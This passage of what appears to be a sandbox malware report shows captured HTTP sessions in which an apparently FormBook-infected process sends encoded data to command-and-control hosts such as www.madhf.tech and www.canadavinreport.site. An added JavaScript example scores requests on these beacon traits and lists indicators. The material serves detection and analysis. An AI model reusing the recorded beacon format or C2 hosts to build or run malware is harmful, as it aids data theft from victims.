                                                       7 | 192.168.2.4 | 49770 | 103.224.182.242 | 80 | 792 | C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Dec 3, 2024 06:54:46.497889996 CET | 10722 | OUT | POST /0mwe/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Length: 10301
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Host: www.madhf.tech
                                                      Origin: http://www.madhf.tech
                                                      Referer: http://www.madhf.tech/0mwe/
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Data Raw: 72 66 4a 68 3d 46 34 58 73 73 64 63 57 39 64 59 6d 56 33 45 6d 74 39 72 6d 57 47 71 50 39 4a 4d 30 4f 68 49 4d 7a 4b 53 71 52 70 72 7a 48 4e 43 39 49 30 4a 68 63 64 4c 56 69 4f 69 58 76 79 7a 56 76 6a 31 66 45 39 67 6e 45 44 70 4c 5a 65 45 61 79 6c 5a 57 4a 65 35 4f 33 76 6c 6c 63 5a 50 59 6f 66 44 57 61 50 36 6d 6b 62 30 38 79 68 46 45 38 4f 70 48 46 44 74 46 6f 76 39 39 46 67 64 36 79 6a 48 38 63 4d 47 31 2b 6c 4b 79 68 44 76 77 4a 52 4a 7a 57 67 6d 67 50 78 32 43 33 4c 63 6f 59 55 33 47 4e 58 64 74 6f 50 68 32 51 45 2b 6d 31 33 2f 35 61 43 65 48 65 44 35 71 61 45 4f 76 54 63 33 45 79 6a 6b 72 31 66 72 32 46 38 66 47 79 38 65 49 2f 5a 6a 41 66 55 77 2b 78 76 67 33 59 42 75 4e 62 77 59 4a 30 39 75 44 4f 51 5a 75 59 51 36 59 6b 63 74 33 61 43 56 55 34 4e 54 64 59 59 4d 65 38 6a 58 45 59 4a 48 39 73 4e 36 36 47 73 4d 5a 65 39 2b 45 51 62 69 77 4c 67 45 49 31 51 49 6d 57 65 63 73 70 52 45 71 72 6c 51 36 52 68 71 57 75 4a 63 77 49 4f 6c 4f 57 32 6e 6d 76 53 54 44 4b 4e 6e 30 51 4b 5a 4a 41 41 36 65 46 [TRUNCATED]
                                                       Data Ascii: rfJh=F4XssdcW9dYmV3Emt9rmWGqP9JM0OhIMzKSqRprzHNC9I0JhcdLViOiXvyzVvj1fE9gnEDpLZeEaylZWJe5O3vllcZPYofDWaP6mkb08yhFE8OpHFDtFov99Fgd6yjH8cMG1+lKyhDvwJRJzWgmgPx2C3LcoYU3GNXdtoPh2QE+m13/5aCeHeD5qaEOvTc3Eyjkr1fr2F8fGy8eI/ZjAfUw+xvg3YBuNbwYJ09uDOQZuYQ6Ykct3aCVU4NTdYYMe8jXEYJH9sN66GsMZe9+EQbiwLgEI1QImWecspREqrlQ6RhqWuJcwIOlOW2nmvSTDKNn0QKZJAA6eF [TRUNCATED]
                                                       Dec 3, 2024 06:54:47.838072062 CET | 871 | IN | HTTP/1.1 200 OK
                                                      date: Tue, 03 Dec 2024 05:54:47 GMT
                                                      server: Apache
                                                      set-cookie: __tad=1733205287.1341641; expires=Fri, 01-Dec-2034 05:54:47 GMT; Max-Age=315360000
                                                      vary: Accept-Encoding
                                                      content-encoding: gzip
                                                      content-length: 576
                                                      content-type: text/html; charset=UTF-8
                                                      connection: close
                                                      Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4a 51 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 5a 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 cb 96 fa ae 4a ca 16 55 cd 0f 32 d4 61 d5 ab ba 6d 0a 42 dd 96 e2 18 49 ca a0 bd 19 08 68 3f a0 4c 09 ef 48 dc a8 ad 3a 46 53 08 5e cb 54 dc 04 d1 18 bb 46 3f 78 63 49 18 d3 60 d1 1b 5b dc 84 b4 2a c5 11 fb 5a aa 2a d9 2a 0f 1e 6b e3 51 d3 cf ce d8 5b 90 90 b5 44 c3 52 88 dd 6e 57 3c ab 13 8b 7e 87 e2 43 b6 4a 12 21 e0 0a 09 14 90 e9 d1 6d 08 5c 03 17 8b 05 f4 46 7b 17 50 3b 5b 07 20 07 78 87 7a 43 c8 c0 c7 12 60 1a a0 16 e1 85 72 18 bc eb 4d e0 98 32 5d 80 c6 79 08 ae 47 a6 a8 e0 6c d2 6c ac 26 e3 2c 1f 77 dd b5 d2 b7 97 53 aa 7c 0e f7 c9 6c 67 6c ed 76 45 e7 b4 8a a8 c2 e3 d0 29 8d f9 6f 9e 4e b3 66 90 67 ef b3 f9 2a 39 24 09 f9 7d 64 b2 ca 40 e0 6b ff 7d 32 21 21 20 4d 9b fc cf 6a 6f a2 41 e6 cf 62 c3 9a e1 db a4 59 c2 a7 67 27 5f ae 58 87 aa f3 fb de 59 43 8e 43 eb 65 94 1d f0 10 99 4f ac 64 [TRUNCATED]
                                                      Data Ascii: TMo0=pvJQl;a*Z[$&iPrm:]lQJU2amBIh?LH:FS^TF?xcI`[*Z**kQ[DRnW<~CJ!m\F{P;[ xzC`rM2]yGll&,wS|lglvE)oNfg*9$}d@k}2!! MjoAbYg'_XYCCeOd6+6og+vOq~y=TGNvzD[bjxeFB}6G9k6^/;8G0uWqbykY-\&RA8Y3Z8%P|q8?WnrSH+px2]WZ^>%fWxV\o


                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                       8 | 192.168.2.4 | 49776 | 103.224.182.242 | 80 | 792 | C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Dec 3, 2024 06:54:49.146585941 CET | 361 | OUT | GET /0mwe/?rfJh=I6/MvosI1M4GXnAB4bTWBGDp85hsOSNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5hB0FWQM1VzVFsJbVN4/hgDK7ji4WzdcK25sZRimZDxLZaBEcPhbk=&O258-=pHdHBdXhwLO HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Connection: close
                                                      Host: www.madhf.tech
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                       Dec 3, 2024 06:54:50.368663073 CET | 1236 | IN | HTTP/1.1 200 OK
                                                      date: Tue, 03 Dec 2024 05:54:50 GMT
                                                      server: Apache
                                                      set-cookie: __tad=1733205290.7632468; expires=Fri, 01-Dec-2034 05:54:50 GMT; Max-Age=315360000
                                                      vary: Accept-Encoding
                                                      content-length: 1484
                                                      content-type: text/html; charset=UTF-8
                                                      connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 6d 61 64 68 66 2e 74 65 63 68 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 66 69 6e 67 65 72 70 72 69 6e 74 2f 69 69 66 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 76 61 72 20 72 65 64 69 72 65 63 74 5f 6c 69 6e 6b 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 61 64 68 66 2e 74 65 63 68 2f 30 6d 77 65 2f 3f 72 66 4a 68 3d 49 36 2f 4d 76 6f 73 49 31 4d 34 47 58 6e 41 42 34 62 54 57 42 47 44 70 38 35 68 73 4f 53 4e 65 39 74 6d 6b 45 73 7a 7a 52 74 4f 57 49 77 52 63 49 76 58 73 30 35 48 61 33 6a 58 59 6f 51 70 78 64 59 35 68 42 30 46 57 51 4d 31 56 7a 56 46 73 4a 62 56 4e 34 2f 68 67 44 4b 37 6a 69 34 57 7a 64 63 4b 32 35 73 5a 52 69 6d 5a 44 78 4c 5a 61 42 45 63 50 68 62 6b 3d 26 4f 32 35 38 2d 3d 70 48 64 48 42 64 58 68 77 4c [TRUNCATED]
                                                      Data Ascii: <html><head><title>madhf.tech</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.madhf.tech/0mwe/?rfJh=I6/MvosI1M4GXnAB4bTWBGDp85hsOSNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5hB0FWQM1VzVFsJbVN4/hgDK7ji4WzdcK25sZRimZDxLZaBEcPhbk=&O258-=pHdHBdXhwLO&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body bgcolor="#ffffff" t
                                                       Dec 3, 2024 06:54:50.368751049 CET | 520 | IN | Data Raw: 65 78 74 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 27 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 61 64 68 66 2e 74 65 63 68 2f 30 6d 77 65 2f 3f 72 66
                                                      Data Ascii: ext="#000000"><div style='display: none;'><a href='http://www.madhf.tech/0mwe/?rfJh=I6/MvosI1M4GXnAB4bTWBGDp85hsOSNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5hB0FWQM1VzVFsJbVN4/hgDK7ji4WzdcK25sZRimZDxLZaBEcPhbk=&O258-=pHdHBdXhwLO&fp=-3'>Click here t


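The requests in sessions 6 through 8 share a set of traits that make this traffic easy to pick out of a capture: the same hard-coded Chrome/31-on-Linux User-Agent on every request, Connection: close on every request, a form body or query string that consists of one four-character parameter (rfJh) carrying an opaque base64 blob, Origin and Referer headers that simply mirror the beacon URL itself, and on the GET a second parameter whose name ends in a dash (O258-). The GET response from www.madhf.tech in session 8 is a FingerprintJS redirect page rather than C2 content, so the classifier below looks only at the request side. The following is an added example, not part of the Joe Sandbox report: it rebuilds the session 6 POST and session 8 GET from the captured headers as constructed samples, adds an invented benign request as a control, and scores each request on those observable traits. The threshold of three matching traits is an assumption chosen for this example.

```javascript
// Added example, not part of the Joe Sandbox report: flag FormBook-style C2 beacons
// using only the traits visible in the captured requests above.

// Exact User-Agent string carried by every request in the capture.
const BEACON_UA =
  'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36';

// Constructed samples: session 6 POST and session 8 GET, rebuilt from the captured headers,
// plus an invented benign request used as a control.
const POST_SESSION6 = [
  'POST /0mwe/ HTTP/1.1', 'Accept: */*', 'Accept-Language: en-US',
  'Accept-Encoding: gzip, deflate, br', 'Content-Length: 201', 'Connection: close',
  'Content-Type: application/x-www-form-urlencoded', 'Cache-Control: max-age=0',
  'Host: www.madhf.tech', 'Origin: http://www.madhf.tech', 'Referer: http://www.madhf.tech/0mwe/',
  `User-Agent: ${BEACON_UA}`, '',
  'rfJh=F4XssdcW9dYmTX0m+OzmHmqMypM0VxIIzKWqRoe+Hfu9IjFhc+jVkOiXpyzZwT1FE9FWED42ZcIayGhWdotJ5/ljKpPfofCMaPKikbhRyhdE/8xHCztK2/99Fgd2yjHccMO9+kD3iw3wI1dzQDOjbB2O2Ldac2q2UX5lpshnZnGb2nX/aiv6WA9hXz2/RIiOkg==',
].join('\r\n');

const GET_SESSION8 = [
  'GET /0mwe/?rfJh=I6/MvosI1M4GXnAB4bTWBGDp85hsOSNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5hB0FWQM1VzVFsJbVN4/hgDK7ji4WzdcK25sZRimZDxLZaBEcPhbk=&O258-=pHdHBdXhwLO HTTP/1.1',
  'Accept: */*', 'Accept-Language: en-US', 'Connection: close', 'Host: www.madhf.tech',
  `User-Agent: ${BEACON_UA}`, '', '',
].join('\r\n');

const BENIGN_CONTROL = [
  'GET /index.html?q=hello HTTP/1.1', 'Host: www.example.invalid',
  'User-Agent: curl/8.4.0', 'Connection: keep-alive', '', '',
].join('\r\n');

// Minimal HTTP/1.1 request parser: request line, lower-cased header map, raw body.
function parseHttpRequest(raw) {
  const sep = raw.indexOf('\r\n\r\n');
  const head = sep === -1 ? raw : raw.slice(0, sep);
  const body = sep === -1 ? '' : raw.slice(sep + 4);
  const lines = head.split('\r\n');
  const [method, target] = lines[0].split(' ');
  const headers = {};
  for (const line of lines.slice(1)) {
    const i = line.indexOf(':');
    if (i > 0) headers[line.slice(0, i).trim().toLowerCase()] = line.slice(i + 1).trim();
  }
  return { method, target, headers, body };
}

// Split "k=v&k2=v2" without percent-decoding: the beacon leaves '+' and '/' unencoded,
// and URLSearchParams would silently turn '+' into a space.
function splitParams(qs) {
  return qs.split('&').filter(Boolean).map((kv) => {
    const i = kv.indexOf('=');
    return i === -1 ? [kv, ''] : [kv.slice(0, i), kv.slice(i + 1)];
  });
}

const B64 = /^[A-Za-z0-9+/]+={0,2}$/;

function classifyBeacon(raw) {
  const req = parseHttpRequest(raw);
  const host = req.headers.host || '';
  const qIdx = req.target.indexOf('?');
  const path = qIdx === -1 ? req.target : req.target.slice(0, qIdx);
  const query = qIdx === -1 ? '' : req.target.slice(qIdx + 1);
  const reasons = [];

  if (req.headers['user-agent'] === BEACON_UA) reasons.push('hardcoded Chrome/31 Linux User-Agent');
  if ((req.headers.connection || '').toLowerCase() === 'close') reasons.push('Connection: close');

  let params;
  if (req.method === 'POST') {
    params = splitParams(req.body);
    if (req.headers['content-type'] === 'application/x-www-form-urlencoded' &&
        req.headers.origin === `http://${host}` &&
        req.headers.referer === `http://${host}${path}`) {
      reasons.push('Origin/Referer mirror the beacon URL itself');
    }
  } else {
    params = splitParams(query);
  }

  // First parameter: four-character name with an opaque base64 blob as its value.
  const first = params[0];
  if (first && /^[A-Za-z0-9]{4}$/.test(first[0]) && B64.test(first[1]) && first[1].length >= 64) {
    const decoded = Buffer.from(first[1], 'base64').length;
    reasons.push(`opaque base64 blob in single parameter "${first[0]}" (${decoded} bytes)`);
  }
  // GET beacons carry a second parameter whose name ends in a dash.
  const second = params[1];
  if (req.method === 'GET' && second && /-$/.test(second[0])) {
    reasons.push(`trailing-dash second parameter "${second[0]}"`);
  }

  // Threshold of three traits is an assumption for this example.
  return { verdict: reasons.length >= 3, method: req.method, host, path,
           param: first ? first[0] : null, reasons };
}

// Collapse a batch of verdicts into the host/path/parameter tuples an analyst would block or hunt for.
function beaconIocs(rawRequests) {
  const seen = new Map();
  for (const raw of rawRequests) {
    const r = classifyBeacon(raw);
    if (r.verdict) seen.set(`${r.host}${r.path}`, { host: r.host, path: r.path, param: r.param });
  }
  return [...seen.values()];
}

console.log(beaconIocs([POST_SESSION6, GET_SESSION8, BENIGN_CONTROL]));
```

The parameter name and the User-Agent are the two traits worth keying a hunt on: the same rfJh and O258- names recur unchanged across all three C2 hosts in this report, so a query string or form body whose first key is rfJh is a tighter indicator than any of the domains.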
                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                       9 | 192.168.2.4 | 49793 | 185.27.134.206 | 80 | 792 | C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Dec 3, 2024 06:54:56.005814075 CET | 650 | OUT | POST /g3h7/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Length: 201
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Host: www.canadavinreport.site
                                                      Origin: http://www.canadavinreport.site
                                                      Referer: http://www.canadavinreport.site/g3h7/
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Data Raw: 72 66 4a 68 3d 51 77 43 32 39 6c 67 76 46 79 30 64 58 5a 4a 63 73 69 6f 65 6b 4e 69 68 5a 54 5a 61 36 39 71 76 77 7a 54 66 53 76 59 42 69 65 55 70 47 65 64 46 2b 41 76 71 44 78 47 41 66 4f 64 45 48 54 5a 38 71 79 77 51 62 4c 4d 6e 4f 67 6d 7a 4f 56 72 41 6a 78 49 75 4f 73 4d 77 4f 76 75 63 4a 64 6a 6f 42 78 72 4b 54 66 56 75 55 44 31 57 79 32 38 33 4a 53 66 75 5a 59 41 41 47 41 30 32 4a 59 73 47 7a 36 67 56 4e 5a 65 46 65 59 45 43 46 30 34 44 4a 4b 5a 6e 42 2b 72 64 47 55 6f 42 6e 4a 4c 53 69 44 62 51 57 67 47 6c 73 6f 47 45 73 6f 43 55 66 33 67 4d 45 59 66 4f 72 4d 69 57 45 48 62 76 4e 67 3d 3d
                                                      Data Ascii: rfJh=QwC29lgvFy0dXZJcsioekNihZTZa69qvwzTfSvYBieUpGedF+AvqDxGAfOdEHTZ8qywQbLMnOgmzOVrAjxIuOsMwOvucJdjoBxrKTfVuUD1Wy283JSfuZYAAGA02JYsGz6gVNZeFeYECF04DJKZnB+rdGUoBnJLSiDbQWgGlsoGEsoCUf3gMEYfOrMiWEHbvNg==
                                                       Dec 3, 2024 06:54:57.242728949 CET | 683 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Tue, 03 Dec 2024 05:54:57 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                      Cache-Control: no-cache
                                                      Content-Encoding: br
                                                      Data Raw: 31 62 39 0d 0a a1 38 1a 00 20 d3 72 fa fa 72 cc c2 85 08 62 4d c9 cc 5f eb 6f 8a b6 3e f3 81 73 a2 4e 74 aa 91 0d be 59 72 e2 80 27 5c 1e 75 a3 9f f0 aa 73 78 fa cf 4d a0 6b 17 12 83 20 a7 24 30 fd 49 0f b5 7a 03 fc a4 e2 78 86 c9 c6 a5 d7 7a f6 0a 41 3f 6c 6e 2c 94 ef fb 52 de 1e 31 72 5e 8b 08 70 2a d9 eb db 2e e6 21 d3 14 75 8d 9a 31 0e 82 5c 99 94 0e 1c 96 74 c4 44 22 f4 0f 71 3f fd 77 91 38 49 5f 05 fa 85 6b 25 da eb 5b 1c 2d b1 76 d6 68 59 d7 37 37 ad 10 fb 4b 7f 4f ff e1 f1 c5 da dd 97 17 f7 bd ed c3 0f 0c f3 38 59 08 71 b6 6d 97 87 f1 7d db bb 5c 96 28 95 b6 20 b2 8f d7 f9 76 1b b6 70 00 21 2a 2f ae 16 d0 a0 20 72 d8 e5 6c 48 e8 7f bc 3d 67 01 fa 0f 98 a5 10 de 99 d8 1a 47 08 8d dc 48 1d 24 13 ca 44 2f 4c eb 39 44 d8 c7 bc 36 9a 71 1e 68 4a 49 cb c0 8c e1 da b4 c2 50 a1 85 e7 26 eb b6 81 c2 e3 56 30 c2 89 24 cc 05 1d 9d 12 3c 11 a3 94 73 d1 79 19 02 cd 2d ee e2 63 98 36 ba 02 98 b2 f0 fe fe 2d bd be 59 58 22 0d 09 ec fc ee e1 55 1d 53 78 f9 7e 7a 2b 02 a6 d8 61 8f 50 09 3b c0 cc 0f ed 68 f2 [TRUNCATED]
                                                      Data Ascii: 1b98 rrbM_o>sNtYr'\usxMk $0IzxzA?ln,R1r^p*.!u1\tD"q?w8I_k%[-vhY77KO8Yqm}\( vp!*/ rlH=gGH$D/L9D6qhJIP&V0$<sy-c6-YX"USx~z+aP;h#AS!Gjr"v>+S5Cml%k%3@O%/e*>JF60


                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                       10 | 192.168.2.4 | 49801 | 185.27.134.206 | 80 | 792 | C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Dec 3, 2024 06:54:58.670360088 CET | 670 | OUT | POST /g3h7/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Length: 221
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Host: www.canadavinreport.site
                                                      Origin: http://www.canadavinreport.site
                                                      Referer: http://www.canadavinreport.site/g3h7/
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Data Raw: 72 66 4a 68 3d 51 77 43 32 39 6c 67 76 46 79 30 64 46 70 35 63 74 46 38 65 69 74 69 6d 46 44 5a 61 77 64 71 72 77 7a 58 66 53 74 30 52 69 73 41 70 48 39 4a 46 73 52 76 71 45 78 47 41 48 2b 64 64 44 54 59 2b 71 79 38 75 62 4c 67 6e 4f 67 79 7a 4f 56 62 41 6a 47 38 76 55 63 4d 79 47 50 75 65 48 39 6a 6f 42 78 72 4b 54 66 52 45 55 44 74 57 79 48 4d 33 4a 7a 66 74 48 49 41 44 42 41 30 32 43 34 73 61 7a 36 67 33 4e 62 71 76 65 61 38 43 46 30 6f 44 4a 66 74 6f 55 4f 72 62 43 55 70 33 76 38 75 37 6a 57 75 42 4a 77 54 44 72 64 69 44 67 4f 50 4f 4f 47 42 62 57 59 37 39 32 4c 72 69 4a 45 6d 6d 57 71 55 36 62 43 7a 39 6c 41 71 32 47 2f 73 67 2f 6f 54 71 42 4a 73 3d
                                                      Data Ascii: rfJh=QwC29lgvFy0dFp5ctF8eitimFDZawdqrwzXfSt0RisApH9JFsRvqExGAH+ddDTY+qy8ubLgnOgyzOVbAjG8vUcMyGPueH9joBxrKTfREUDtWyHM3JzftHIADBA02C4saz6g3Nbqvea8CF0oDJftoUOrbCUp3v8u7jWuBJwTDrdiDgOPOOGBbWY792LriJEmmWqU6bCz9lAq2G/sg/oTqBJs=
                                                       Dec 3, 2024 06:54:59.951869011 CET | 683 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Tue, 03 Dec 2024 05:54:59 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                      Cache-Control: no-cache
                                                      Content-Encoding: br
                                                      Data Raw: 31 62 39 0d 0a a1 38 1a 00 20 d3 72 fa fa 72 cc c2 85 08 62 4d c9 cc 5f eb 6f 8a b6 3e f3 81 73 a2 4e 74 aa 91 0d be 59 72 e2 80 27 5c 1e 75 a3 9f f0 aa 73 78 fa cf 4d a0 6b 17 12 83 20 a7 24 30 fd 49 0f b5 7a 03 fc a4 e2 78 86 c9 c6 a5 d7 7a f6 0a 41 3f 6c 6e 2c 94 ef fb 52 de 1e 31 72 5e 8b 08 70 2a d9 eb db 2e e6 21 d3 14 75 8d 9a 31 0e 82 5c 99 94 0e 1c 96 74 c4 44 22 f4 0f 71 3f fd 77 91 38 49 5f 05 fa 85 6b 25 da eb 5b 1c 2d b1 76 d6 68 59 d7 37 37 ad 10 fb 4b 7f 4f ff e1 f1 c5 da dd 97 17 f7 bd ed c3 0f 0c f3 38 59 08 71 b6 6d 97 87 f1 7d db bb 5c 96 28 95 b6 20 b2 8f d7 f9 76 1b b6 70 00 21 2a 2f ae 16 d0 a0 20 72 d8 e5 6c 48 e8 7f bc 3d 67 01 fa 0f 98 a5 10 de 99 d8 1a 47 08 8d dc 48 1d 24 13 ca 44 2f 4c eb 39 44 d8 c7 bc 36 9a 71 1e 68 4a 49 cb c0 8c e1 da b4 c2 50 a1 85 e7 26 eb b6 81 c2 e3 56 30 c2 89 24 cc 05 1d 9d 12 3c 11 a3 94 73 d1 79 19 02 cd 2d ee e2 63 98 36 ba 02 98 b2 f0 fe fe 2d bd be 59 58 22 0d 09 ec fc ee e1 55 1d 53 78 f9 7e 7a 2b 02 a6 d8 61 8f 50 09 3b c0 cc 0f ed 68 f2 [TRUNCATED]
                                                      Data Ascii: 1b98 rrbM_o>sNtYr'\usxMk $0IzxzA?ln,R1r^p*.!u1\tD"q?w8I_k%[-vhY77KO8Yqm}\( vp!*/ rlH=gGH$D/L9D6qhJIP&V0$<sy-c6-YX"USx~z+aP;h#AS!Gjr"v>+S5Cml%k%3@O%/e*>JF60


                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                       11 | 192.168.2.4 | 49809 | 185.27.134.206 | 80 | 792 | C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Dec 3, 2024 06:55:01.337131023 CET | 10752 | OUT | POST /g3h7/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Length: 10301
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Host: www.canadavinreport.site
                                                      Origin: http://www.canadavinreport.site
                                                      Referer: http://www.canadavinreport.site/g3h7/
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Data Raw: 72 66 4a 68 3d 51 77 43 32 39 6c 67 76 46 79 30 64 46 70 35 63 74 46 38 65 69 74 69 6d 46 44 5a 61 77 64 71 72 77 7a 58 66 53 74 30 52 69 73 34 70 47 50 52 46 2b 69 33 71 46 78 47 41 5a 4f 64 41 44 54 59 2f 71 79 30 71 62 4c 63 64 4f 6b 43 7a 50 30 37 41 6c 30 55 76 61 73 4d 79 4b 76 75 44 4a 64 6a 48 42 77 48 47 54 66 42 45 55 44 74 57 79 45 6b 33 4c 69 66 74 46 49 41 41 47 41 30 36 4a 59 73 6d 7a 36 34 4e 4e 59 47 56 65 75 41 43 45 51 30 44 4c 74 31 6f 57 75 72 5a 50 30 70 2f 76 38 71 67 6a 51 4b 4e 4a 77 6d 6d 72 62 65 44 71 4c 32 33 63 32 45 41 45 6f 72 5a 70 59 62 2b 42 6c 36 6c 56 61 46 43 55 42 76 4b 2b 42 43 68 4d 64 64 51 67 4b 66 72 58 4a 53 41 6a 69 35 41 7a 72 79 54 55 66 53 76 57 51 2b 49 62 76 50 67 4e 66 79 74 71 35 35 52 4b 37 73 70 48 66 30 2f 63 54 48 56 59 64 32 6b 6c 75 61 53 50 6f 6a 39 78 50 34 79 58 61 5a 53 4c 6a 37 6c 6f 69 7a 48 4f 47 56 56 35 38 54 53 66 6f 51 51 4a 41 43 61 6c 41 55 78 38 67 58 64 66 66 45 42 58 44 4f 4b 47 43 44 41 66 70 4f 56 57 63 46 30 63 74 2b 57 4d [TRUNCATED]
                                                       Data Ascii: rfJh=QwC29lgvFy0dFp5ctF8eitimFDZawdqrwzXfSt0Ris4pGPRF+i3qFxGAZOdADTY/qy0qbLcdOkCzP07Al0UvasMyKvuDJdjHBwHGTfBEUDtWyEk3LiftFIAAGA06JYsmz64NNYGVeuACEQ0DLt1oWurZP0p/v8qgjQKNJwmmrbeDqL23c2EAEorZpYb+Bl6lVaFCUBvK+BChMddQgKfrXJSAji5AzryTUfSvWQ+IbvPgNfytq55RK7spHf0/cTHVYd2kluaSPoj9xP4yXaZSLj7loizHOGVV58TSfoQQJACalAUx8gXdffEBXDOKGCDAfpOVWcF0ct+WM [TRUNCATED]
                                                       Dec 3, 2024 06:55:02.622072935 CET | 683 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Tue, 03 Dec 2024 05:55:02 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                      Cache-Control: no-cache
                                                      Content-Encoding: br
